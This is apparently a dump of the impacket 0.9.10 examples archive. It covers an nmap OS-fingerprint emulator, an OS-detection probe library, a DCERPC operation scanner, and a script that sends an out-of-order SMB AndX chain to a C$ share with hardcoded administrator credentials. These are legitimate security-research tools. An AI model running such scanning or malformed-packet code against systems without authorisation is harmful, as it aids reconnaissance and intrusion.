tcp.add_option(TCPOption(TCPOption.TCPOPT_SACK_PERMITTED)) if opt == 'T': opt = TCPOption(TCPOption.TCPOPT_TIMESTAMP) # default ts = 0, ts_echo = 0 if options[i] == '1': opt.set_ts(self.machine.getTCPTimeStamp()) if options[i+1] == '1': opt.set_ts_echo(0xffffffffL) tcp.add_option(opt) i += 2 if opt == 'M': maxseg, i = getValue(options, i) tcp.add_option(TCPOption(TCPOption.TCPOPT_MAXSEG, maxseg)) if opt == 'W': window, i = getValue(options, i) tcp.add_option(TCPOption(TCPOption.TCPOPT_WINDOW, window)) class nmap2_SEQ(NMAP2TCPResponder): templateClass = None signatureName = None seqNumber = None def initFingerprint(self): NMAP2TCPResponder.initFingerprint(self) if not self.seqNumber: return else: OPS = self.machine.fingerprint.get_tests()['OPS'] WIN = self.machine.fingerprint.get_tests()['WIN'] self.fingerprint['O'] = OPS['O%d' % self.seqNumber] self.fingerprint['W'] = WIN['W%d' % self.seqNumber] class nmap2_ECN(NMAP2TCPResponder): templateClass = os_ident.nmap2_ecn_probe signatureName = 'ECN' class nmap2_SEQ1(nmap2_SEQ): templateClass = os_ident.nmap2_seq_1 signatureName = 'T1' seqNumber = 1 class nmap2_SEQ2(nmap2_SEQ): templateClass = os_ident.nmap2_seq_2 signatureName = 'T1' seqNumber = 2 class nmap2_SEQ3(nmap2_SEQ): templateClass = os_ident.nmap2_seq_3 signatureName = 'T1' seqNumber = 3 class nmap2_SEQ4(nmap2_SEQ): templateClass = os_ident.nmap2_seq_4 signatureName = 'T1' seqNumber = 4 class nmap2_SEQ5(nmap2_SEQ): templateClass = os_ident.nmap2_seq_5 signatureName = 'T1' seqNumber = 5 class nmap2_SEQ6(nmap2_SEQ): templateClass = os_ident.nmap2_seq_6 signatureName = 'T1' seqNumber = 6 class nmap2_T2(NMAP2TCPResponder): templateClass = os_ident.nmap2_tcp_open_2 signatureName = 'T2' class nmap2_T3(NMAP2TCPResponder): templateClass = os_ident.nmap2_tcp_open_3 signatureName = 'T3' class nmap2_T4(NMAP2TCPResponder): templateClass = os_ident.nmap2_tcp_open_4 signatureName = 'T4' class nmap2_T5(NMAP2TCPResponder): templateClass = os_ident.nmap2_tcp_closed_1 signatureName = 'T5' class nmap2_T6(NMAP2TCPResponder): templateClass = os_ident.nmap2_tcp_closed_2 signatureName = 'T6' class nmap2_T7(NMAP2TCPResponder): templateClass = os_ident.nmap2_tcp_closed_3 signatureName = 'T7' class nmap2_ICMP_1(NMAP2ICMPResponder): templateClass = os_ident.nmap2_icmp_echo_probe_1 signatureName = 'IE' class nmap2_ICMP_2(NMAP2ICMPResponder): templateClass = os_ident.nmap2_icmp_echo_probe_2 signatureName = 'IE' class Machine: AssumedTimeIntervalPerPacket = 0.11 # seconds def __init__(self, emmulating, interface, ipAddress, macAddress, openTCPPorts = [], openUDPPorts = [], nmapOSDB = 'nmap-os-db'): self.interface = interface self.ipAddress = ipAddress self.macAddress = macAddress self.responders = [] self.decoder = ImpactDecoder.EthDecoder() self.initPcap() self.initFingerprint(emmulating, nmapOSDB) self.initSequenceGenerators() self.openTCPPorts = openTCPPorts self.openUDPPorts = openUDPPorts print self def openUDPPort(self, port): if self.isUDPPortOpen(port): return self.openUDPPorts.append(port) def isUDPPortOpen(self, port): return port in self.openUDPPorts def isTCPPortOpen(self, port): return port in self.openTCPPorts def initPcap(self): self.pcap = pcapy.open_live(self.interface, 65535, 1, 0) try: self.pcap.setfilter("host %s or ether host %s" % (self.ipAddress, self.macAddress)) except: self.pcap.setfilter("host %s or ether host %s" % (self.ipAddress, self.macAddress), 1, 0xFFFFFF00) def initGenericResponders(self): # generic responders self.addResponder(ARPResponder(self)) self.addResponder(OpenUDPResponder(self)) self.addResponder(ClosedUDPResponder(self)) self.addResponder(OpenTCPResponder(self)) self.addResponder(ClosedTCPResponder(self)) def initFingerprint(self, emmulating, nmapOSDB): fpm = os_ident.NMAP2_Fingerprint_Matcher('') f = file(nmapOSDB, 'r') for text in fpm.fingerprints(f): fingerprint = fpm.parse_fp(text) if fingerprint.get_id() == emmulating: self.fingerprint = fingerprint self.simplifyFingerprint() # print fingerprint return raise Exception, "Couldn't find fingerprint data for %r" % emmulating def simplifyFingerprint(self): tests = self.fingerprint.get_tests() for probeName in tests: probe = tests[probeName] for test in probe: probe[test] = probe[test].split('|')[0] def initSequenceGenerators(self): self.initIPIDGenerator() self.initTCPISNGenerator() self.initTCPTSGenerator() def initIPIDGenerator(self): seq = self.fingerprint.get_tests()['SEQ'] self.ip_ID = 0 try: TI = seq['TI'] except: TI = 'O' if TI == 'Z': self.ip_ID_delta = 0 elif TI == 'RD': self.ip_ID_delta = 30000 elif TI == 'RI': self.ip_ID_delta = 1234 elif TI == 'BI': self.ip_ID_delta = 1024+256 elif TI == 'I': self.ip_ID_delta = 1 elif TI == 'O': self.ip_ID_delta = 123 else: self.ip_ID_delta = int(TI, 16) try: ss = seq['SS'] except: ss = 'O' self.ip_ID_ICMP_delta = None if ss == 'S': self.ip_ID_ICMP = None else: self.ip_ID_ICMP = 0 try: II = seq['II'] except: II = 'O' if II == 'Z': self.ip_ID_ICMP_delta = 0 elif II == 'RD': self.ip_ID_ICMP_delta = 30000 elif II == 'RI': self.ip_ID_ICMP_delta = 1234 elif II == 'BI': self.ip_ID_ICMP_delta = 1024+256 elif II == 'I': self.ip_ID_ICMP_delta = 1 elif II == 'O': self.ip_ID_ICMP_delta = 123 else: self.ip_ID_ICMP_delta = int(II, 16) # generate a few, so we don't start with 0 when we don't have to for i in range(10): self.getIPID() self.getIPID_ICMP() print "IP ID Delta: %d" % self.ip_ID_delta print "IP ID ICMP Delta: %s" % self.ip_ID_ICMP_delta def initTCPISNGenerator(self): # tcp_ISN and tcp_ISN_delta for TCP Initial sequence numbers self.tcp_ISN = 0 try: self.tcp_ISN_GCD = int(self.fingerprint.get_tests()['SEQ']['GCD'].split('-')[0], 16) except: self.tcp_ISN_GCD = 1 try: isr = self.fingerprint.get_tests()['SEQ']['ISR'].split('-') if len(isr) == 1: isr = int(isr[0], 16) else: isr = (int(isr[0], 16) + int(isr[1], 16)) / 2 except: isr = 0 try: sp = self.fingerprint.get_tests()['SEQ']['SP'].split('-') sp = int(sp[0], 16) except: sp = 0 self.tcp_ISN_stdDev = (2**(sp/8.0)) * 5 / 4 # n-1 on small populations... erm... if self.tcp_ISN_GCD > 9: self.tcp_ISN_stdDev *= self.tcp_ISN_GCD self.tcp_ISN_stdDev *= self.AssumedTimeIntervalPerPacket self.tcp_ISN_delta = 2**(isr/8.0) * self.AssumedTimeIntervalPerPacket # generate a few, so we don't start with 0 when we don't have to for i in range(10): self.getTCPSequence() print "TCP ISN Delta: %f" % self.tcp_ISN_delta print "TCP ISN Standard Deviation: %f" % self.tcp_ISN_stdDev def initTCPTSGenerator(self): # tcp_TS and tcp_TS_delta for TCP Time stamp generation self.tcp_TS = 0 try: ts = self.fingerprint.get_tests()['SEQ']['TS'] except: ts = 'U' if ts == 'U' or ts == 'Z': self.tcp_TS_delta = 0 else: self.tcp_TS_delta = (2**int(ts, 16)) * self.AssumedTimeIntervalPerPacket # generate a few, so we don't start with 0 when we don't have to for i in range(10): self.getTCPTimeStamp() print "TCP TS Delta: %f" % self.tcp_TS_delta def getIPID(self): answer = self.ip_ID self.ip_ID += self.ip_ID_delta self.ip_ID %= 0x10000L # print "IP ID: %x" % answer return answer def getIPID_ICMP(self): if self.ip_ID_ICMP is None: return self.getIPID() answer = self.ip_ID_ICMP self.ip_ID_ICMP += self.ip_ID_ICMP_delta self.ip_ID_ICMP %= 0x10000L # print "---> IP ID: %x" % answer return answer def getTCPSequence(self): answer = self.tcp_ISN + self.tcp_ISN_stdDev # *random.random() self.tcp_ISN_stdDev *= -1 answer = int(int(answer/self.tcp_ISN_GCD) * self.tcp_ISN_GCD) self.tcp_ISN += self.tcp_ISN_delta self.tcp_ISN %= 0x100000000L # print "---> TCP Sequence: %d" % (answer % 0x100000000L) return answer % 0x100000000L def getTCPTimeStamp(self): answer = int(round(self.tcp_TS)) self.tcp_TS += self.tcp_TS_delta self.tcp_TS %= 0x100000000L # print "---> TCP Time Stamp: %x" % answer return answer def sendPacket(self, onion): if not onion: return print "--> Packet sent:" #print onion[0] #print self.pcap.sendpacket(onion[O_ETH].get_packet()) def addResponder(self, aResponder): self.responders.append(aResponder) def run(self): while 1: p = self.pcap.next() try: in_onion = [self.decoder.decode(p[1])] except: in_onion = [self.decoder.decode(p[0])] try: while 1: in_onion.append(in_onion[-1].child()) except: pass #print "-------------- Received: ", in_onion[0] for r in self.responders: if r.process(in_onion): break def main(): def initResponders(machine): # cmd responder # machine.addResponder(UDPCommandResponder(machine).set_port(UDP_CMD_PORT)) # nmap2 specific responders machine.addResponder(nmap2_SEQ1(machine)) machine.addResponder(nmap2_SEQ2(machine)) machine.addResponder(nmap2_SEQ3(machine)) machine.addResponder(nmap2_SEQ4(machine)) machine.addResponder(nmap2_SEQ5(machine)) machine.addResponder(nmap2_SEQ6(machine)) machine.addResponder(nmap2_ECN(machine)) machine.addResponder(nmap2_T2(machine)) machine.addResponder(nmap2_T3(machine)) machine.addResponder(nmap2_T4(machine)) machine.addResponder(nmap2_T5(machine)) machine.addResponder(nmap2_T6(machine)) machine.addResponder(nmap2_T7(machine)) machine.addResponder(nmap2_ICMP_1(machine)) machine.addResponder(nmap2_ICMP_2(machine)) machine.addResponder(NMAP2UDPResponder(machine)) from sys import argv, exit def usage(): print """ if arg == '-h': usage() if arg == '--help': usage() if arg == '-f': Fingerprint = value if arg == '-p': IP = value if arg == '-m': MAC = value if arg == '-i': IFACE = value if arg == '-d': nmapOsDB = value where: arg = argv[i] value = argv[i+1] """ exit() global Fingerprint, IFACE, MAC, IP, nmapOSDB for i in xrange(len(argv)): arg = argv[i] try: value = argv[i+1] except: value = None if arg == '-h': usage() if arg == '--help': usage() if arg == '-f': Fingerprint = value if arg == '-p': IP = value if arg == '-m': MAC = value if arg == '-i': IFACE = value if arg == '-d': nmapOSDB = value print "Emulating: %r" % Fingerprint print "at %s / %s / %s" % (IFACE, MAC, IP) machine = Machine( Fingerprint, IFACE, IP, MAC, OPEN_TCP_PORTS, OPEN_UDP_PORTS, nmapOSDB = nmapOSDB) initResponders(machine) machine.initGenericResponders() machine.run() if __name__ == '__main__': main() # All Probes # [x] SEQ # [x] OPS # [x] WIN # [x] T1 # [x] T2 # [x] T3 # [x] T4 # [x] T5 # [x] T6 # [x] T7 # [x] IE # [x] ECN # [x] U1 # All Tests # SEQ() # [x] TCP ISN sequence predictability index (SP) # [x] TCP ISN greatest common divisor (GCD) # [x] TCP ISN counter rate (ISR) # [x] IP ID sequence generation algorithm on TCP Open ports (TI) # [x] Z - All zeros # [x] RD - Random: It increments at least once by at least 20000. # [-] Hex Value - fixed IP ID # [x] RI - Random positive increments. Any (delta_i > 1000, and delta_i % 256 != 0) or (delta_i > 256000 and delta_i % 256 == 0) # [x] BI - Broken increment. All delta_i % 256 = 0 and all delta_i <= 5120. # [x] I - Incremental. All delta_i < 10 # [x] O - (Ommited, the test does not show in the fingerprint). None of the other # [-] IP ID sequence generation algorithm on TCP closed ports (CI) # [x] IP ID sequence generation algorithm on ICMP messages (II) # [x] Shared IP ID sequence Boolean (SS) # [x] TCP timestamp option algorithm (TS) # [x] U - unsupported (don't send TS) # [x] 0 - Zero # [x] 1 - 0-5.66 (2 Hz) # [x] 7 - 70-150 (100 Hz) # [x] 8 - 150-350 (200 Hz) # [x] - avg_freq = sum(TS_diff/time_diff) . round(.5 + math.log(avg_freq)/math.log(2))) # time_diff = 0.11 segs # OPS() # [x] TCP options (O, O1-O6) # WIN() # [x] TCP initial window size (W, W1-W6) # ECN, T1-T7 # [x] TCP options (O, O1-O6) # [x] TCP initial window size (W, W1-W6) # [x] Responsiveness (R) # [x] IP don't fragment bit (DF) # [x] IP initial time-to-live (T) # [x] IP initial time-to-live guess (TG) # [x] Explicit congestion notification (CC) # [x] TCP miscellaneous quirks (Q) # [x] TCP sequence number (S) # [x] TCP acknowledgment number (A) # [x] TCP flags (F) # [x] TCP RST data checksum (RD) # IE() # [x] Responsiveness (R) # [x] Don't fragment (ICMP) (DFI) # [x] IP initial time-to-live (T) # [x] IP initial time-to-live guess (TG) # [x] ICMP response code (CD) #-[x] IP Type of Service (TOSI) #-[x] ICMP Sequence number (SI) #-[x] IP Data Length (DLI) # U1() # [x] Responsiveness (R) # [x] IP don't fragment bit (DF) # [x] IP initial time-to-live (T) # [x] IP initial time-to-live guess (TG) # [x] IP total length (IPL) # [x] Unused port unreachable field nonzero (UN) # [x] Returned probe IP total length value (RIPL) # [x] Returned probe IP ID value (RID) # [x] Integrity of returned probe IP checksum value (RIPCK) # [x] Integrity of returned probe UDP checksum (RUCK) # [x] Integrity of returned UDP data (RUD) # [-] ??? (TOS) Type of Service # [-] ??? (RUL) Length of return UDP packet is correct # sudo nmap -O 127.0.0.2 -p 22,111,89 # sudo python nmapAnswerMachine.py -i eth0 -p 192.168.66.254 -f 'Sun Solaris 9 (SPARC)' impacket-0.9.10/examples/oochain.py0000600000076500000240000000545012141750576017266 0ustar betostaff00000000000000from impacket import smb import os class lotsSMB(smb.SMB): def do_lots(self, user, pwd_ansi, share, filename, domain = ''): pkt = smb.NewSMBPacket() pkt['Flags1'] = 8 sessionSetup = smb.SMBCommand(self.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Parameters() sessionSetup['Data'] = smb.SMBSessionSetupAndX_Data() sessionSetup['Parameters']['MaxBuffer'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VCNumber'] = os.getpid() sessionSetup['Parameters']['SessionKey'] = self.get_session_key() sessionSetup['Parameters']['AnsiPwdLength'] = len(pwd_ansi) sessionSetup['Parameters']['UnicodePwdLength'] = len('') sessionSetup['Parameters']['Capabilities'] = self.CAP_RAW_MODE sessionSetup['Data']['AnsiPwd'] = pwd_ansi sessionSetup['Data']['UnicodePwd'] = '' sessionSetup['Data']['Account'] = str(user) sessionSetup['Data']['PrimaryDomain'] = str(domain) sessionSetup['Data']['NativeOS'] = str(os.name) sessionSetup['Data']['NativeLanMan'] = 'pysmb' # This is an example of how to use chained ANDX commands treeConnect = smb.SMBCommand(self.SMB_COM_TREE_CONNECT_ANDX) treeConnect['Parameters'] = smb.SMBTreeConnectAndX_Parameters() treeConnect['Data'] = smb.SMBTreeConnectAndX_Data() treeConnect['Parameters']['PasswordLength'] = 1 treeConnect['Data']['Password'] = '\x00' treeConnect['Data']['Path'] = share treeConnect['Data']['Service'] = smb.SERVICE_ANY openFile = smb.SMBCommand(self.SMB_COM_OPEN_ANDX) openFile['Parameters'] = smb.SMBOpenAndX_Parameters() openFile['Parameters']['DesiredAccess'] = smb.SMB_ACCESS_READ openFile['Parameters']['OpenMode'] = smb.SMB_O_OPEN openFile['Parameters']['SearchAttributes'] = 0 openFile['Data'] = smb.SMBOpenAndX_Data() openFile['Data']['FileName'] = filename readAndX = smb.SMBCommand(self.SMB_COM_READ_ANDX) readAndX['Parameters'] = smb.SMBReadAndX_Parameters() readAndX['Parameters']['Offset'] = 0 readAndX['Parameters']['Fid'] = 0 readAndX['Parameters']['MaxCount'] = 4000 pkt.addCommand(sessionSetup) pkt.addCommand(openFile) pkt.addCommand(readAndX) pkt.addCommand(treeConnect) treeConnect['Parameters']['AndXCommand'] = sessionSetup['Parameters']['AndXCommand'] treeConnect['Parameters']['AndXOffset'] = sessionSetup['Parameters']['AndXOffset'] sessionSetup['Parameters']['AndXCommand'] = readAndX['Parameters']['AndXCommand'] sessionSetup['Parameters']['AndXOffset'] = readAndX['Parameters']['AndXOffset'] readAndX['Parameters']['AndXCommand'] = 0xff readAndX['Parameters']['AndXOffset'] = 0 self.sendSMB(pkt) pkt = self.recvSMB() s = lotsSMB('*SMBSERVER','192.168.1.1') s.do_lots('Administrator','password', r'\\*SMBSERVER\C$', r'\gera') impacket-0.9.10/examples/opdump.py0000600000076500000240000000353212141750576017151 0ustar betostaff00000000000000#!/usr/bin/python """opdump - scan for operations on a given DCERPC interface Usage: opdump.py hostname port interface version This binds to the given hostname:port and DCERPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call. This will generate a burst of TCP connections to the given host:port! Example: $ ./opdump.py 10.0.0.30 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0 op 0 (0x00): rpc_x_bad_stub_data op 1 (0x01): rpc_x_bad_stub_data op 2 (0x02): rpc_x_bad_stub_data op 3 (0x03): success op 4 (0x04): rpc_x_bad_stub_data ops 5-255: nca_s_op_rng_error rpc_x_bad_stub_data, rpc_s_access_denied, and success generally means there's an operation at that number. Author: Catalin Patulea """ import sys from impacket import uuid from impacket.dcerpc import transport, dcerpc, dcerpc_v4 def main(args): if len(args) != 4: print "usage: opdump.py hostname port interface version" return 1 host, port, interface, version = args[0], int(args[1]), args[2], args[3] stringbinding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(stringbinding) trans.set_dport(port) results = [] for i in range(256): dce = dcerpc.DCERPC_v5(trans) dce.connect() iid = uuid.uuidtup_to_bin((interface, version)) dce.bind(iid) dce.call(i, "") try: resp = dce.recv() except dcerpc.Exception, e: result = str(e) else: result = "success" dce.disconnect() results.append(result) # trim duplicate suffixes from the back suffix = results[-1] while results and results[-1] == suffix: results.pop() for i, result in enumerate(results): print "op %d (0x%02x): %s" % (i, i, result) print "ops %d-%d: %s" % (len(results), 255, suffix) if __name__ == "__main__": sys.exit(main(sys.argv[1:])) impacket-0.9.10/examples/os_ident.py0000600000076500000240000022454112141750576017456 0ustar betostaff00000000000000#-- # $Id$ # # Copyright (c) 2001-2003 CORE Security Technologies, CORE SDI Inc. # All rights reserved. # # This computer software is owned by Core SDI Inc. and is # protected by U.S. copyright laws and other laws and by international # treaties. This computer software is furnished by CORE SDI Inc. # pursuant to a written license agreement and may be used, copied, # transmitted, and stored only in accordance with the terms of such # license and with the inclusion of the above copyright notice. This # computer software or any other copies thereof may not be provided or # otherwise made available to any other person. # #` # THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR # CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF # THIS SOFTWARE # #-- from impacket.ImpactPacket import * from impacket.ImpactDecoder import * g_nmap1_signature_filename="nmap-os-fingerprints" g_nmap2_signature_filename="nmap-os-db" class os_id_exception: def __init__(self, value): self.value = value def __str__(self): return `self.value` class os_id_test: def __init__(self, id): self.__id = id self.__my_packet = None self.__result_dict = {} def test_id(self): return self.__class__.__name__ def get_test_packet(self): return self.__my_packet.get_packet() def set_packet(self, packet): self.__my_packet = packet def get_packet(self): return self.__my_packet def process(self, packet): pass def add_result(self, name, value): self.__result_dict[name] = value def get_id(self): return self.__id def is_mine(self, packet): pass def get_result_dict(self): return self.__result_dict; def get_final_result(self): "Returns a string representation of the final result of this test or None if no response was received" pass class icmp_request(os_id_test): type_filter = { ICMP.ICMP_ECHO : ICMP.ICMP_ECHOREPLY, ICMP.ICMP_IREQ : ICMP.ICMP_IREQREPLY, ICMP.ICMP_MASKREQ : ICMP.ICMP_MASKREPLY, ICMP.ICMP_TSTAMP : ICMP.ICMP_TSTAMPREPLY } def __init__(self, id, addresses, type): os_id_test.__init__(self, id) self.e = Ethernet() self.i = IP() self.icmp = ICMP() self.i.set_ip_src(addresses[0]) self.i.set_ip_dst(addresses[1]) self.__type = type self.icmp.set_icmp_type(type) self.e.contains(self.i) self.i.contains(self.icmp) self.set_packet(self.e) def is_mine(self, packet): if packet.get_ether_type() != ImpactPacket.IP.ethertype: return 0 ip = packet.child() if not ip or ip.get_ip_p() != ImpactPacket.ICMP.protocol: return 0 icmp = ip.child() # icmp_request.type_filter is a dictionary that maps request # type codes to the reply codes if not icmp or \ icmp.get_icmp_type() != icmp_request.type_filter[self.__type]: return 0 if icmp.get_icmp_id() != self.get_id(): return 0 return 1 def process(self, packet): pass class nmap2_icmp_echo_probe_1(icmp_request): # The first one has the IP DF bit set, a type-of-service (TOS) byte # value of zero, a code of nine (even though it should be zero), # the sequence number 295, a random IP ID and ICMP request identifier, # and a random character repeated 120 times for the data payload. sequence_number = 295 id = 0x5678 def __init__(self, id, addresses): icmp_request.__init__(self, id, addresses, ICMP.ICMP_ECHO) self.i.set_ip_df(True) self.i.set_ip_tos(0) self.icmp.set_icmp_code(9) self.icmp.set_icmp_seq(nmap2_icmp_echo_probe_1.sequence_number) self.i.set_ip_id(nmap2_icmp_echo_probe_1.id) self.icmp.set_icmp_id(nmap2_icmp_echo_probe_1.id) self.icmp.contains(Data("I" * 120)) def process(self, packet): pass class nmap2_icmp_echo_probe_2(icmp_request): # The second ping query is similar, except a TOS of four # (IP_TOS_RELIABILITY) is used, the code is zero, 150 bytes of data is # sent, and the IP ID, request ID, and sequence numbers are incremented # by one from the previous query values. def __init__(self, id, addresses): icmp_request.__init__(self, id, addresses, ICMP.ICMP_ECHO) self.i.set_ip_df(False) self.i.set_ip_tos(4) self.icmp.set_icmp_code(0) self.icmp.set_icmp_seq(nmap2_icmp_echo_probe_1.sequence_number + 1) self.i.set_ip_id(nmap2_icmp_echo_probe_1.id + 1) self.icmp.set_icmp_id(nmap2_icmp_echo_probe_1.id + 1) self.icmp.contains(Data("I" * 150)) def process(self, packet): pass class udp_closed_probe(os_id_test): ip_id = 0x1234 # HARDCODED def __init__(self, id, addresses, udp_closed ): os_id_test.__init__(self, id ) self.e = Ethernet() self.i = IP() self.u = UDP() self.i.set_ip_src(addresses[0]) self.i.set_ip_dst(addresses[1]) self.i.set_ip_id(udp_closed_probe.ip_id) self.u.set_uh_sport(id) self.u.set_uh_dport( udp_closed ) self.e.contains(self.i) self.i.contains(self.u) self.set_packet(self.e) def is_mine(self, packet): if packet.get_ether_type() != ImpactPacket.IP.ethertype: return 0 ip = packet.child() if not ip or ip.get_ip_p() != ImpactPacket.ICMP.protocol: return 0 icmp = ip.child() if not icmp or icmp.get_icmp_type() != ICMP.ICMP_UNREACH: return 0 if icmp.get_icmp_code() != ICMP.ICMP_UNREACH_PORT: return 0; self.err_data = icmp.child() if not self.err_data: return 0 return 1 class tcp_probe(os_id_test): def __init__(self, id, addresses, tcp_ports, open_port ): self.result_string = "[]" os_id_test.__init__(self, id) self.e = Ethernet() self.i = IP() self.t = TCP() self.i.set_ip_src(addresses[0]) self.i.set_ip_dst(addresses[1]) self.i.set_ip_id(0x2323) # HARDCODED self.t.set_th_sport(id) if open_port: self.target_port = tcp_ports[0] else: self.target_port = tcp_ports[1] self.t.set_th_dport(self.target_port) self.e.contains(self.i) self.i.contains(self.t) self.set_packet(self.e) self.source_ip = addresses[0] self.target_ip = addresses[1] def socket_match(self, ip, tcp): # scr ip and port if (ip.get_ip_src() != self.target_ip) or (tcp.get_th_sport() != self.target_port): return 0 # dst ip and port if(ip.get_ip_dst() != self.source_ip) or (tcp.get_th_dport() != self.get_id()): return 0 return 1 def is_mine(self, packet): if packet.get_ether_type() != ImpactPacket.IP.ethertype: return 0 ip = packet.child() if not ip or ip.get_ip_p() != ImpactPacket.TCP.protocol: return 0 tcp = ip.child() if self.socket_match(ip, tcp): return 1 return 0 class nmap_tcp_probe(tcp_probe): def __init__(self, id, addresses, tcp_ports, open_port, sequence, options): tcp_probe.__init__(self, id, addresses, tcp_ports, open_port) self.t.set_th_seq(sequence) self.set_resp(False) for op in options: self.t.add_option(op) def set_resp(self,resp): pass class nmap1_tcp_probe(nmap_tcp_probe): sequence = 0x8453 # 0xBASE, obviously mss = 265 # From: http://nmap.org/nmap-fingerprinting-old.html # [...] # Nmap sends these options along with almost every probe packet: # Window Scale=10; NOP; Max Segment Size = 265; Timestamp; End of Ops; # [...] # From nmap-4.22SOC8/osscan.cc:get_fingerprint(...) # [...] # "\003\003\012\001\002\004\001\011\010\012\077\077\077\077\000\000\000\000\000\000" # [...] tcp_options = [ TCPOption(TCPOption.TCPOPT_WINDOW, 012), #\003\003\012 TCPOption(TCPOption.TCPOPT_NOP), #\001 TCPOption(TCPOption.TCPOPT_MAXSEG, mss), #\002\004\001\011 TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0x3F3F3F3F), #\010\012\077\077\077\077\000\000\000\000 TCPOption(TCPOption.TCPOPT_EOL), #\000 TCPOption(TCPOption.TCPOPT_EOL) #\000 ] def __init__(self, id, addresses, tcp_ports, open_port): nmap_tcp_probe.__init__(self, id, addresses, tcp_ports, open_port, self.sequence, self.tcp_options) def set_resp(self,resp): if resp: self.add_result("Resp", "Y") else: self.add_result("Resp", "N") def process(self, packet): ip = packet.child() tcp = ip.child() self.set_resp(True) if ip.get_ip_df(): self.add_result("DF", "Y") else: self.add_result("DF", "N") self.add_result("W", tcp.get_th_win()) if tcp.get_th_ack() == self.sequence + 1: self.add_result("ACK", "S++") elif tcp.get_th_ack() == self.sequence: self.add_result("ACK", "S") else: self.add_result("ACK", "O") flags = [] # TCP flags if tcp.get_ECE(): flags.append("B") if tcp.get_URG(): flags.append("U") if tcp.get_ACK(): flags.append("A") if tcp.get_PSH(): flags.append("P") if tcp.get_RST(): flags.append("R") if tcp.get_SYN(): flags.append("S") if tcp.get_FIN(): flags.append("F") self.add_result("FLAGS", flags) options = [] for op in tcp.get_options(): if op.get_kind() == TCPOption.TCPOPT_EOL: options.append("L") elif op.get_kind() == TCPOption.TCPOPT_MAXSEG: options.append("M") if op.get_mss() == self.mss: options.append("E") # Echoed elif op.get_kind() == TCPOption.TCPOPT_NOP: options.append("N") elif op.get_kind() == TCPOption.TCPOPT_TIMESTAMP: options.append("T") elif op.get_kind() == TCPOption.TCPOPT_WINDOW: options.append("W") self.add_result("OPTIONS", options) def get_final_result(self): return {self.test_id(): self.get_result_dict()} class nmap2_tcp_probe(nmap_tcp_probe): acknowledgment = 0x181d4f7b def __init__(self, id, addresses, tcp_ports, open_port, sequence, options): nmap_tcp_probe.__init__(self, id, addresses, tcp_ports, open_port, sequence, options) self.t.set_th_ack(self.acknowledgment) def set_resp(self,resp): # Responsiveness (R) # This test simply records whether the target responded to a given probe. # Possible values are Y and N. If there is no reply, remaining fields # for the test are omitted. if resp: self.add_result("R", "Y") else: self.add_result("R", "N") def process(self, packet): ip = packet.child() tcp = ip.child() # R, DF, T*, TG*, W, S, A, F, O, RD*, Q self.set_resp(True) tests = nmap2_tcp_tests(ip, tcp, self.sequence, self.acknowledgment) self.add_result("DF", tests.get_df()) self.add_result("W", tests.get_win()) self.add_result("S", tests.get_seq()) self.add_result("A", tests.get_ack()) self.add_result("F", tests.get_flags()) self.add_result("O", tests.get_options()) self.add_result("Q", tests.get_quirks()) def get_final_result(self): return {self.test_id() : self.get_result_dict()} class nmap2_ecn_probe(nmap_tcp_probe): # From nmap-4.22SOC8/osscan2.cc: # [...] # "\003\003\012\001\002\004\005\264\004\002\001\001" # [...] # From: http://nmap.org/book/osdetect-methods.html # [...] # This probe tests for explicit congestion notification (ECN) support # in the target TCP stack. ECN is a method for improving Internet # performance by allowing routers to signal congestion problems before # they start having to drop packets. It is documented in RFC 3168. # Nmap tests this by sending a SYN packet which also has the ECN CWR # and ECE congestion control flags set. For an unrelated (to ECN) test, # the urgent field value of 0xF7F5 is used even though the urgent flag # is not set. The acknowledgment number is zero, sequence number is # random, window size field is three, and the reserved bit which # immediately precedes the CWR bit is set. TCP options are WScale (10), # NOP, MSS (1460), SACK permitted, NOP, NOP. The probe is sent to an # open port. # [...] tcp_options = [ TCPOption(TCPOption.TCPOPT_WINDOW, 012), #\003\003\012 TCPOption(TCPOption.TCPOPT_NOP), #\001 TCPOption(TCPOption.TCPOPT_MAXSEG, 1460), #\002\004\005\0264 TCPOption(TCPOption.TCPOPT_SACK_PERMITTED), #\004\002 TCPOption(TCPOption.TCPOPT_NOP), #\001 TCPOption(TCPOption.TCPOPT_NOP) #\001 ] def __init__(self, id, addresses, tcp_ports): nmap_tcp_probe.__init__(self, id, addresses, tcp_ports, 1, 0x8b6a, self.tcp_options) self.t.set_SYN() self.t.set_CWR() self.t.set_ECE() self.t.set_flags(0x800) self.t.set_th_urp(0xF7F5) self.t.set_th_ack(0) self.t.set_th_win(3) #self.t.set_th_flags(self.t.get_th_flags() | 0x0100) # 0000 0001 00000000 def test_id(self): return "ECN" def set_resp(self,resp): if resp: self.add_result("R", "Y") else: self.add_result("R", "N") def process(self, packet): ip = packet.child() tcp = ip.child() # R, DF, T*, TG*, W, O, CC, Q self.set_resp(True) tests = nmap2_tcp_tests(ip, tcp, 0, 0) self.add_result("DF", tests.get_df()) self.add_result("W", tests.get_win()) self.add_result("O", tests.get_options()) self.add_result("CC", tests.get_cc()) self.add_result("Q", tests.get_quirks()) def get_final_result(self): return {self.test_id() : self.get_result_dict()} class nmap2_tcp_tests: def __init__(self, ip, tcp, sequence, acknowledgment): self.__ip = ip self.__tcp = tcp self.__sequence = sequence self.__acknowledgment = acknowledgment def get_df(self): # IP don't fragment bit (DF) # The IP header contains a single bit which forbids routers from fragmenting # a packet. If the packet is too large for routers to handle, they will just # have to drop it (and ideally return a "destination unreachable, # fragmentation needed" response). This test records Y if the bit is set, # and N if it isn't. if self.__ip.get_ip_df(): return "Y" else: return "N" def get_win(self): # TCP initial window size (W, W1-W6) # This test simply records the 16-bit TCP window size of the received packet. return "%X" % self.__tcp.get_th_win() def get_ack(self): # TCP acknowledgment number (A) # This test is the same as S except that it tests how the acknowledgment # number in the response compares to the sequence number in the # respective probe. # Value Description # Z Acknowledgment number is zero. # S 